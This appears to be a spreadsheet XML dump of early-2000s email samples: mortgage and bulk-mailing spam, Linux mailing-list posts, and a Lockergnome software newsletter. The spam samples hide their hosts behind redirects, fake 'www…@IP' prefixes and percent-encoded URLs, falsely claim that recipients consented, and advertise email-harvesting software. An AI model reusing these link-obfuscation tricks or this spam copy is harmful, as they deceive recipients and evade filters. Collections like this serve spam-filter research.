 "4" class=3D"main"&gt;&lt;tr&gt; &lt;td width=3D"50%" valign=3D"top"&gt;
     &lt;div align=3D"center"&gt; &lt;b&gt;&lt;font size=3D"5"&gt;Let us do the shopping for =
 you... AND IT'S FREE!&lt;/font&gt;&lt;/b&gt;&lt;p&gt;&lt;img src=3D"http://61.129.81.74/pix2/im=
 ages/ad2.gif" width=3D"142" height=3D"218"&gt;&lt;/p&gt;&lt;/div&gt;
   &lt;/td&gt;&lt;td width=3D"50%" valign=3D"top"&gt;
     &lt;font size=3D"3"&gt;&lt;i&gt;&lt;br&gt;Our nationwide network of lenders have hundred=
 s of different loan programs to fit your current situation:&lt;/i&gt;&lt;b&gt;&lt;ul&gt;
     &lt;li&gt;Refinance&lt;/li&gt;&lt;li&gt;Second Mortgage&lt;/li&gt;&lt;li&gt;Debt Consolidation&lt;/li&gt;&lt;=
 li&gt;Home Improvement&lt;/li&gt;&lt;li&gt;Purchase &lt;/li&gt;&lt;/ul&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;
     &lt;p&gt;Please &lt;b&gt;&lt;a href=3D"http://rd.yahoo.com/dir/?http://www.8121919554=
 75675676734203545847582013@61.129.81.78/pix2/mortgageform.htm"&gt;CLICK HERE&lt;=
 /a&gt;&lt;/b&gt; to fill out a quick form. Your request will be transmitted to our =
 network of mortgage specialists.&lt;/p&gt;&lt;/font&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"2"&gt;&lt;t=
 r&gt;&lt;td bgcolor=3D"#0D86FF"&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"8" cl=
 ass=3D"main"&gt;&lt;tr&gt;&lt;td bgcolor=3D"#0066CC"&gt; 
     &lt;div align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;This service is &lt;a href=3D"h=
 ttp://rd.yahoo.com/dir/?http://www.812191956757575734203545847582013@61.12=
 9.81.74/pix2/mortgageform.htm" class=3D"yellow"&gt;100% FREE&lt;/a&gt; to home owne=
 rs and new home buyers without any obligation.&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table align=3D"center" width=3D"600" cellspacing=3D"2" cellpadding=3D"2=
 " border=3D"0" class=3D"footer"&gt;&lt;tr&gt; &lt;td colspan=3D"2"&gt;&lt;br&gt;
     &lt;font color=3D"ED1C24"&gt;Did you receive an email advertisement in error=
 ?&lt;/font&gt; Our goal is to only target individuals who would like to take adv=
 antage of our offers. If you'd like to be removed from our mailing list, p=
 lease click on the link below. You will be removed immediately and automat=
 ically from all of our future mailings.&lt;br&gt;
     &lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td&gt;We protect all email addresses from other third=
  parties. Thank you.
   &lt;/td&gt;&lt;td align=3D"right"&gt;&lt;a href=3D"http://rd.yahoo.com/dir/?http://61.1=
 29.81.74/remove/remove.htm"&gt;Please remove me.&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">the only way to insure a safe key is to use all the storage space in the
 universe. too big to decrypt.
 my point is there will never be a "safe" key. what I would consider is how
 long does the data need to be protected. if you need to protect the data for
 longer than 6 months, do not release it to the public. if you are trying to
 stop the general public (your customer) from coping the data then use what
 is available on the market. If you want to stop the bootleggers do not
 release the data to the public.
 I have never seen a lock that could not be unlocked. the act of unlocking
 the key gives away it's secret.
 the tougher the lock the more pissed-off your customers will be. take MS-XP
 for example. only the home user is forced to register. think of the
 nightmare if business had to register every copy. how many times have we
 needed to reinstall our laptop OS? notice the amount of Mac's sold after the
 XP release. these where mostly home users that converted to Mac OS.
 the new Audio CD's that have digital copy protection so not play on my
 computer. does this stop me from copying the CD? no. however it does make me
 return them and get my money back.
 the more popular the software the more likely it is to be cracked.
 jef
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Delivered-To: fork@spamassassin.taint.org
 To: fork@spamassassin.taint.org
 Subject: Re: Optical analog computing?
 From: Dave Long &lt;dl@silcom.com&gt;
 Sender: fork-admin@xent.com
 Date: Wed, 02 Oct 2002 11:09:34 -0700
 &gt; &gt; "the first computer to crack enigma was optical"
 &gt;
 &gt; Computing with interference patterns, etc, makes perfect sense, but Enigma
 &gt; was cracked by building mechanical systems that were essentially Enigma
 &gt; machines and brute-forcing.
 Look for "Zygalski sheets".
 By Koerner's* narrative, it wound up
 being a hybrid affair: Bletchley had
 mock Enigmas which cycled through the
 Enigma's ~18k starting positions in a
 quarter of an hour, but the Germans
 started using a plugboard which then
 had ~1.5x10^14 possibilities.  The
 Poles noticed that there were some
 patterns in the messages which were
 only possible via certain plugboard
 settings, and so:
 &gt; When we have collected several such cards corresponding to different
 &gt; initial signals ..., we place them in a pile so that the squares
 &gt; corresponding to the same daily settings are aligned and shine a
 &gt; light beneath the pile.  Only those squares which let the light
 &gt; through will correspond to possible daily settings.
 So the brute force hardware allowed
 precalculation of "optical" computing
 devices which then narrowed down the
 possibilities enough for brute force
 to again be used for daily decodes,
 until:
 &gt; On 10 May, the Germans invaded France and, on the same day, in
 &gt; accordance with the best cryptographic principles, they changed their
 &gt; Enigma procedures in such a way that the 1560 Zygalski sheets, each
 &gt; with their carefully drilled 1000 or so holes, became just so much
 &gt; waste cardboard.
 -Dave
 ::::::
 &gt; &gt; "the first synthetic-aperture-radar processor was optical"
 This is also easy to believe, given Dr.
 Elachi's description of the 1981 Shuttle
 Imaging Radar:
 &gt; The received signal is recorded on an optical film which is retrieved
 &gt; after landing.  The film ... is then processed in an optical correlator
 &gt; to generate the final image.
 which makes sense, as one wishes to shift
 each component of the return in proportion
 to its frequency, for which one presumably
 needs a glorified prism.
 &gt; Alternatively, the ... signal can be digitized and then recorded on
 &gt; board or transmitted to the ground via a digital data link.  This was
 &gt; the case with the ... sensor flown in 1984.
 ::::::
 * Koerner, _The Pleasures of Counting_,
 in which various aspects of the Enigma
 decoding cover four chapters, of which
 I quote from two sections of one:
 14.2: Beautiful Polish females, and
 14.3: Passing the torch
 &gt; Churchill's romantic soul loved the excitement and secrecy surrounding
 &gt; Bletchley.  He relished the way that
 &gt; &gt; [t]he old procedures, like the setting up of agents, the suborning
 &gt; &gt; of informants, the sending of messages written in invisible ink,
 &gt; &gt; the masquerading, the dressing-up, the secret transmitters, and the
 &gt; &gt; examining of the contents of waste-paper baskets, all turned out
 &gt; &gt; to be largely cover for this other source, as one might keep some
 &gt; &gt; old-established business in rare books going in order to be able,
 &gt; &gt; under cover of it, to do a thriving trade in pornography and erotica
 &gt; ...
 &gt; Looking at the disparate, unkempt and definitely unmilitary crew
 &gt; formed by his top code-breakers, he is said to have added to his head
 &gt; of Intelligence "I know I told you to leave no stone unturned to find
 &gt; the necessary staff, but I did not mean you to take me so literally!"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</si>
  <si>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Patton, Tony wrote:
 &gt; On Tue, 2002-07-30 at 10:06, Donncha O Caoimh wrote:
 &gt; &gt; Ar mhaith le einne anseo caint le TG4 faoin LBW?
 &gt; &gt; 
 &gt; &gt; Donncha.
 &gt; &gt; 
 &gt; 
 &gt; ----8&lt;
 &gt; 
 &gt; &gt; T m ag danamh taighde don clr teilifse An Tuath Nua (a bhonn 
 &gt; &gt; chraoladh ar TG4) faoi lthair, agus chonaic m go mbedih an Linux Beer
 &gt; &gt; Hike ar sil i Doolin i mbliana. Bheadh spis againn mr a dhanamh mar
 &gt; &gt; gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le
 &gt; &gt; Gaeilge ar an Hike go bhfios duit?
 &gt; &gt; 
 &gt; &gt; Go raibh maith agat as do chabhair,
 &gt; &gt; 
 &gt; 
 &gt; ----&gt;8
 &gt; 
 &gt; Can someone translate this for me? Lost all sense of Irish when moved
 &gt; over the border about 10 years ago. Not by choice mind you :-(
 In short, "I'm involved in making a TV program "The New Road"
 (which will be on TG4) at the moment, and I saw that there'll be
 a Linux Beer Hike in Doolin this year. We'd be delighted to do a
 report about the hike for the programme - will yourself or
 anyone else with Irish be on the hike? Thanks for the help,
 A chara,
 Dave.
 -- 
        David Neary,
     Marseille, France
   E-Mail: bolsh@gimp.org
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 9 Aug 2002, Ryan, Shane wrote:
 &gt; Is this something along the same line as ORBS? 
 SPEWS isnt it. It lists known spam source IPs and netblocks. (and if 
 an ISP does nothing more than shift a spammer from IP to IP within the 
 ISPs netblock, then the ISPs netblock will be listed.)
 and there are quite a few ORBS like lists out there - ie known open
 relay lists.
 &gt; I remember not so long ago when eircom was put on the ORBS list,
 &gt; half the ISP's in Europe wouldn't accept mail from my address. Of
 &gt; course, informing Eircom of this did nothing for about 4 months or
 &gt; so.
 shame.
 get a different ISP so.
 &gt; IMHO stopping spammers is a great idea but I'd rather have to hit d
 &gt; or delete rather than have my messages bounced by someone else's
 &gt; ISP.
 I'd rather not get spam. sorry.
 &gt; Regards,
 &gt; Shane
 regards,
 -- 
 Paul Jakma	Sys Admin	Alphyra
 	paulj@alphyra.ie
 Warning: /never/ send email to spam@dishone.st or trap@dishone.st
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 27, 2002 at 11:58:10AM -0700, Paul O'Neil wrote:
 &gt; If I want to use tcpd for ftp and only one user will ever ftp but I dont
 &gt; know what IP that user is because its dialup DHCP how do I setup tcpd for
 &gt; that user?
 please don't reply to messages to send a new topic to ilug.  those of
 us using threaded mail clients find that really annoying.
 tcpd is host based filtering/auth.  so if the ip is dynamic, you can't
 really use it.  however ftp supports user based auth - actually it kind
 of requires a user, so just set up an account for that person.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</si>
  <si>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BULKER CD! BULKER CD!
</t>
  </si>
  <si>
    <t xml:space="preserve">**************************************BULKER CD**********************
 ************************MAY 22 2002*********************************************************************
 **************************************************************************************************************
 HI ,  
 As a professional bulk mailer for 5 years. I made over $200,000 last 12 months selling only one product, "The Banned CD".
 Luckily for you, the 'Bulker CD 2003" is now for sale! I decide to sell all secrets how I made over $20,000 per month at home only few hours work.
 Why don't more people use Bulk Email Marketing?
 1. Lack of knowledge. Most people do not know how to set up a marketing campaign let alone set up an effective email marketing campaign. Through hard work and trial and error, we have developed simple yet successful strategies to send your emails. We can show you how to do it properly.
 2. Fear of getting into trouble. Most people do not send email because they have heard negative things about SPAM and that your isp will shut you down. This is true if you don't know what you are doing and bulk email to the masses. If you don't believe in SPAM, we have developed alternative ways to bulk email so that you are sending your emails responsibly without getting into any trouble at all.
 3. Don't have the necessary equipment/softwares. To send your emails out, you need a computer with specialized email software installed that will send or harvest your emails.
 We are the email marketing software experts! The softwares ranging will up to thousands of dollars. Buying the correct software for your needs can be confusing. Depending on your budget, requirements and goals, we can help recommend the best software for you.
 BULKER CD-ROM has everything you need to start bulk Emailing immediately, all on this one CD!  
 BULKER CD-ROM is excellent for the beginner as well as the professional. Advertising my products have never been easier!
 Please Click the URL for the Detail! 
 http://%77%77%77%2E%62a%6E%6E%65%64c%64%2E%6E%65%74/bulk.htm
 You are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from netcommission. To Be Removed From Our List, http://%77%77%77%2E%62a%6E%6E%65%64c%64%2E%6E%65%74/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020716.html"&gt;
       http://www.lockergnome.com/issues/daily/20020716.html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#990000 }
  a:link    { COLOR: #000000; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #C84200; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: GRAY; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #FFCC99; BORDER-BOTTOM: #FF9966 4px solid; BORDER-LEFT: #FFEEDD 4px solid; BORDER-RIGHT: #FF9966 4px solid; BORDER-TOP: #FFEEDD 4px solid; COLOR: #990000; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #FFEEDD; TEXT-ALIGN: center; BORDER-BOTTOM: #FFCC99 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #FFCC99 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #990000; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020716 Lockergnome Windows Daily&lt;/title&gt;&lt;/head&gt;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href="http://www.qksrv.net/click-471546-5032686"&gt;&lt;img src="http://www.qksrv.net/image-471546-5032686" width="468" height="60" alt="DDR Memory at Crucial.com" border="0"&gt;&lt;/a&gt;
  &lt;br&gt;
  &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt" --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font color="#990000" face="Verdana, Tahoma, Arial" style="font-size: 10pt" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp; 07.16.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Hackers and crackers respect only one thing:&lt;/b&gt; &lt;font color="blue"&gt;strong security&lt;/font&gt;. Keep the bad guys out of your PC or network with the advanced technology that's trusted by millions: ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends your online privacy,and sets up in minutes. &lt;a href="http://psstt.com/1/c/22869/63809/191269/191269"&gt;Click here to download now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Well, it's been half a week since we released it, and we're still
 getting record downloads for our first
 &lt;a href="http://www.gnometomes.com/"&gt;FREE Gnometome&lt;/a&gt;. What does
 that mean? Simple. Download all you want - we'll definitely make
 more. In fact, we've found a way to get your products and services
 a little bit of unlimited promotion on the side, too. And who
 couldn't use a little more traffic nowadays? Well, unless your
 data transfer bill is already sky high (which can happen when you
 get featured). It's all fun and games until someone's server falls
 to its knees. We're still &lt;A HREF="http://www.amazon.com/exec/obidos/redirect?tag%3Dlockergnomedigit%26path%3Dsearch-handle-url%2Ffield-keywords%3Dlockergnome"&gt;sitting
 at #5 on Amazon&lt;/A&gt;. If we ever
 hit #1, I'll eat my hat. And, mind you, this hat has been sitting
 around for quite a while; it smells like feet. You'd have to eat
 three sombreros just to get the same amount of nutrition you'd get
 from my hat. You're better off just going for the free stuff, I
 suppose. The next time they ask: "Do you care to Super Size that?"
 You can respond, with dignity: "My funds are sufficient for the
 upgrade; I avoided spending money on something that would have
 lasted longer, supported a helpful cause, and not have killed me
 earlier." It makes sense - if you think about it. The fries aren't
 going to eat themselves. And if YOU don't eat the fries, who will?
 &lt;p&gt;
 Put your hunger aside for just a moment. It's time for a paragraph
 I like to call: "Why you shouldn't sign up for DirectDSL." They
 went out of their way to send me an unsolicited e-mail this
 evening. Now, I know what you're thinking: "How kind of them,
 Chris. You were just asking about DSL providers in yesterday's
 issue. They must have read your mind!" No, they must have rented a
 list of addresses which weren't confirmed. But the fun didn't stop
 there. I received a message about DirectTV from yet ANOTHER
 marketing company. Their effort was indeed caught by this crafty
 eye, and my money will be diverted to other (less-spammish)
 businesses in the future. It's my "direct" way of saying: you're
 not the only game in town. Anybody else care to test my patience?
 I didn't think so. My blacklist gets shared with 250,000 people
 from around the world. Oops! My Inbox just got slammed with more
 junk; looks like Lycos will never get another click from me,
 either. See what you get when you tempt fate?
 &lt;p&gt;
 My good buddy, &lt;a href="http://www.dnscentral.com/"&gt;Bill&lt;/a&gt;,
 tells me that &lt;a href="http://www.speakeasy.net/refer/62026"&gt;Speakeasy.net&lt;/a&gt;
 provides great DSL connections. He'll even get the credit if I
 sign up through his affiliate link! Paul Howes agrees with him,
 too: "Static IPs are the norm, they do not use PPPoE, and they
 encourage people to run servers on their DSL connection. When
 looking at their packages, I suggest you look at the 'Home
 Services' page. They even have ADSL up to 1.5M downstream / 768k
 upstream, which I have not seen from any other provider. And that
 is less than $200 a month, which is a bargain when you start
 looking at the prices of a 768k SDSL line!" And Stuart Portner is
 chock full of common sense: "Remember that a lot of DSL providers
 give you the modem for free and prefer that you use theirs - at
 least for initial setup / shakedown period." All the more fries
 for me, dude!
 &lt;!-- DOWNLOADS --&gt;
 &lt;p align="right"&gt;See You in &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;August&lt;/a&gt;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;font style="font-size: 23pt" face="Chris Pirillo, Script"&gt;Chris Pirillo&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeCONFERENCE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img alt="Heigh-Ya!" src="http://chris.pirillo.com/archives/gnomedexshirt.gif" width="320" height="258" border="0" /&gt;&lt;br&gt;$99 Pre-Registration / $150 At The Door&lt;/a&gt;&lt;/center&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDOWNLOADS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Today's Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=100298"&gt;AppPlus 3.24&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=101109"&gt;EaseBackup 3.70&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=101536"&gt;HotCrypt 4.12&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=101751"&gt;Arles Image Web Pa 4.94&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103079"&gt;Smasher 2.9.12&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103431"&gt;The Bat! 1.61&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103869"&gt;WinSafe 1.1.2&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=104359"&gt;Privacy Eraser 1.68&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103961"&gt;Zero Popup 3.0&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103863"&gt;WinPulse 1.01&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Company Overview v1.3 [389k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.toteboard.net/Models/company_overview.htm"&gt;http://www.toteboard.net/Models/company_overview.htm&lt;/a&gt;
 &lt;p&gt;
 {Check your stocks} When you're doing long-term investing, the
 best thing to do with your money is to invest and then "forget
 about it." Our Gnomie buddy Brian Stevens is the type of guy that
 likes to play the stock market. He's always logging into E*TRADE
 and checking on his stocks. That's a lot of work! We told him to
 forget about it and let Company Overview do the work. This Excel
 spreadsheet and add-in is a great way to check stocks and save the
 data into a separate Excel spreadsheet. Brian says, "E*TRADE
 doesn't give me half the information that Company Overview does,
 such as insider trades and financial trends, along with many other
 tidbits of information." NOTE: You must use Excel 2000 or higher
 for the spreadsheet to operate correctly.
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Flexible Renamer v5.2.0 [426k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://hp.vector.co.jp/authors/VA014830/english/FlexRena/"&gt;http://hp.vector.co.jp/authors/VA014830/english/FlexRena/&lt;/a&gt;
 &lt;p&gt;
 {Rename your files} I work with a lot of files throughout the day,
 and sometimes I end up with a desktop cluttered with useless
 copies and shortcuts - and you KNOW how I feel about clutter. I
 don't need a reminder that there are five shortcuts or six copies
 of something on my desktop... and that is where Flexible Renamer
 comes into the picture. With Flexible Renamer, I can cut off the
 "Shortcut to" and "Copy of" prefixes from all my files, making
 them a lot easier to read. That's not all though... you can even
 make a .txt file on your desktop into a .doc document in seconds.
 If you don't like your filename in all caps, then just switch them
 to lower case and vice-versa. The possibilities are endless! (You
 know, I always wanted to change my own name from "Chris" to
 "Caspian Wildflowers"...)
 &lt;!-- SPECIALS --&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeCLICKS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;
 &lt;td valign=top align=center&gt;&lt;a target="_blank" href="http://www.infopackets.com/cgi-bin/click.cgi?id=83"&gt;&lt;img src="http://www.lockergnome.com/images/ads/icon.hotwindowstip.gif" height="62" width="62" alt="TECHNOLOGY can be frustrating for new and intermediate computer users, UNTIL NOW. Join us for a FREE Windows Newsletter, video tutorials, articles, special reports, and more!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign=top align=center&gt;&lt;a target="_blank" href="http://www.picozip.com/lg/"&gt;&lt;img src="http://www.picozip.com/ads/picozip_lg.gif" height="60" width="63" alt="The easiest way to Zip/UnZip. An AWARD-WINNING file compression utility featuring quick backup, batch processing, Windows integration and SUPPORTS 15 archive formats (ACE, RAR, etc)." border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign=top align=center&gt;&lt;a target="_blank" href="http://www.handybackup.com"&gt;&lt;img src="http://www.lockergnome.com/images/ads/icon.handybackup.gif" height="62" width="33" alt="Handy Backup" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign=top align=center&gt;&lt;a target="_blank" href="http://www.outlooksecure.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/icon.outlooksecure.gif" height="57" width="60" alt="Secure your E-Mail!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign=top align=center&gt;&lt;a target="_blank" href="http://www.capitalintellect.net/indexlgicon.htm"&gt;&lt;img src="http://www.capitalintellect.net/lg1/images/shortcut.gif" height="62" width="62" alt="Shortcut to RDesk.exe" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign=top align=center&gt;&lt;a target="_blank" href="http://www.paessler.com/?ref=LGGCIP"&gt;&lt;img src="http://www.lockergnome.com/images/ads/icon.ipcheck1.gif" height="63" width="39" alt="IPCheck Server Monitor monitors a network using various protocols (e.g. ping, http, smtp, ftp) and notifies the staff in various ways as soon as an outage occurs." border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td valign=top align=center&gt;&lt;a target="_blank" href="http://outlook.4team.biz/?fr=gnome"&gt;&lt;img src="http://www.lockergnome.com/images/ads/icon.outlook4team.1.gif" height="60" width="60" alt="Share your team/project contacts, calendars, tasks, etc. in MS Oulook 2002, without a server!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;!-- SYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Disk Investigator v1.1 [527k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.theabsolute.net/sware/dskinv.html"&gt;http://www.theabsolute.net/sware/dskinv.html&lt;/a&gt;
 &lt;p&gt;
 {Restore deleted files} Have you ever deleted a file from your PC,
 realizing later that you actually needed it? Yeah, me too. Best-
 case scenario, I would just go to the Recycle Bin and retrieve my
 deleted file. But what if I had already emptied the Recycle Bin?
 (Horrors!) Luckily, Disk Investigator can come into play and save
 the day. (Yay!) With Disk Investigator, I can view deleted files
 or directories, and restore them if necessary. I no longer have to
 wonder if I fully deleted a troublesome file... I just load up
 Disk Investigator, and I'll know if the file is gone (with 100%
 certainty)!
 &lt;!-- WILDCARD --&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeWILDCARD&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Actual Title Buttons 1.3 [1.0M] W9x/2k/XP $19.95&lt;/b&gt;&lt;BR&gt;
     Unearthed by Michael Tretyakov
 &lt;p&gt;
 &lt;a class="URL" href="http://www.actualtools.com/"&gt;http://www.actualtools.com/&lt;/a&gt;
 &lt;p&gt;
 {Windows Explorer add-on} "Actual Title Buttons lets you add the
 new Minimize To Tray and Stay On Top buttons to any program's
 title bar next to the Windows standard Minimize/Maximize/Close
 buttons." This program is a must for anyone who wants to avoid the
 distractions of other windows popping up over your active windows.
 While writing this review, I am using the "Stay On Top" command
 for Notepad, and during this time I have already received five
 instant messages. Why is this important? Normally these messages
 would pop up in front of Notepad and disrupt my work... but with
 Actual Title Buttons, I can keep typing without missing those
 "important" instant messages. The only difference is that they
 aren't an annoyance now. The "Minimize To Tray" feature is great,
 too, because freeing up taskbar space is a beautiful thing...
 especially when you don't have to close down your programs to do
 it.
 &lt;!-- FAVORITE --&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="http://www.lockergnome.com/submit.html"&gt;Submit Your Thoughts&lt;/a&gt; &lt;font class="url" color="gray"&gt;|&lt;/font&gt; &lt;a class="url" style="color: gray; text-decoration: none" href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;/p&gt;
